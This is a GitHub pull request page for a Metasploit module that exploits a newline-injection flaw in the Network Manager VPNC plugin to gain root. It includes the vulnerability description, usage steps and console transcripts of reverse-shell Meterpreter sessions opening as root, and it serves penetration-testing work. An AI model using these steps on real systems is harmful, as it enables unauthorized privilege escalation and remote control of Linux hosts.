Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Network Manager VPNC Username Privilege Escalation module #10482

Merged
merged 2 commits into from Aug 30, 2018
Merged

Add Network Manager VPNC Username Privilege Escalation module #10482

merged 2 commits into from Aug 30, 2018

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Aug 19, 2018

Add Network Manager VPNC Username Privilege Escalation module.

    This module exploits an injection vulnerability in the Network Manager
    VPNC plugin to gain root privileges.

    This module uses a new line injection vulnerability in the configured
    username for a VPN network connection to inject a `Password helper`
    configuration directive into the connection configuration.

    The specified helper is executed by Network Manager as root when the
    connection is started.

    Network Manager VPNC versions prior to 1.2.6 are vulnerable.

    This module has been tested successfully with VPNC versions:
    1.2.4-4 on Debian 9.0.0 (x64); and
    1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/linux/local/network_manager_vpnc_username_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: run
  6. You should get a new root session
msf5 > use exploit/linux/local/network_manager_vpnc_username_priv_esc 
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set lhost 172.16.191.188 
lhost => 172.16.191.188
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[+] nmcli utility is installed
[*] Adding VPN connection...
[*] Uploading payload...
[*] Writing '/tmp/.4FCA0Pp4tw' (237 bytes) ...
[*] Starting VPN connection...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (861480 bytes) to 172.16.191.201
[+] Deleted /tmp/.4FCA0Pp4tw
[*] Removing VPN connection...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.201
OS           : Ubuntu 16.04 (Linux 4.13.0-41-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

@space-r7 space-r7 self-assigned this Aug 29, 2018
@space-r7
Copy link
Contributor

Tested on Ubuntu 16.04:

msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 3
session => 3
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] nmcli utility is installed
[*] Adding VPN connection...
[*] Uploading payload...
[*] Writing '/tmp/.CgNExsftqfT0zr1' (237 bytes) ...
[*] Starting VPN connection...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (861480 bytes) to 192.168.37.1
[*] Meterpreter session 4 opened (192.168.37.1:4444 -> 192.168.37.1:53711) at 2018-08-30 10:19:45 -0500
[*] Removing VPN connection...
[+] Deleted /tmp/.CgNExsftqfT0zr1

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.215.148
OS           : Ubuntu 16.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

@space-r7 space-r7 merged commit f09148d into rapid7:master Aug 30, 2018
space-r7 added a commit that referenced this pull request Aug 30, 2018
@space-r7
Land #10482, Add Network Manager VPNC Privesc
6ec8522
msjenkins-r7 pushed a commit that referenced this pull request Aug 30, 2018
@space-r7 @msjenkins-r7
Land #10482, Add Network Manager VPNC Privesc
bc87643
@space-r7
Copy link
Contributor

space-r7 commented Aug 30, 2018
edited by tdoan-r7

Release Notes

A module that exploits an injection vulnerability in the Network Manager VPNC plugin has been added to the framework. It can be used to gain root privileges.

@bcoles bcoles deleted the network_manager_vpnc_username_priv_esc branch August 31, 2018 08:38
@tdoan-r7 tdoan-r7 added rn-enhancement release notes enhancement rn-exploit and removed rn-enhancement release notes enhancement labels Sep 12, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@space-r7 space-r7

Labels
docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@bcoles @space-r7 @tdoan-r7